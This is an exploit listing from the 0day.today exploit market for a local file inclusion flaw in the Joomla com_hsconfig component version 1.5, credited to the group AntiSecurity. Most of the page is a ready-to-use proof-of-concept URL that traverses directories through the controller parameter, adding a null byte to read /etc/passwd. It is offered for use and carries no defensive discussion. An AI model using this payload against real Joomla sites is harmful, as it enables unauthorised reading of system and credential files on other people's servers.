[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component Highslide JS com_hsconfig Local File Inclusion

Author
AntiSecurity
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11651
Category
web applications
Date add
06-04-2010
Platform
php
=============================================================================
Joomla Component Highslide JS com_hsconfig Local File Inclusion Vulnerability
=============================================================================

===============================================================================================================
 
 
  [o] Joomla Component Highslide JS Local File Inclusion Vulnerability
  
       Software : com_hsconfig version 1.5
       Vendor   : http://www.joomlanook.com/
       Author   : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
===============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_hsconfig&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
 
 
===============================================================================================================





#  0day.today [2024-12-23]  #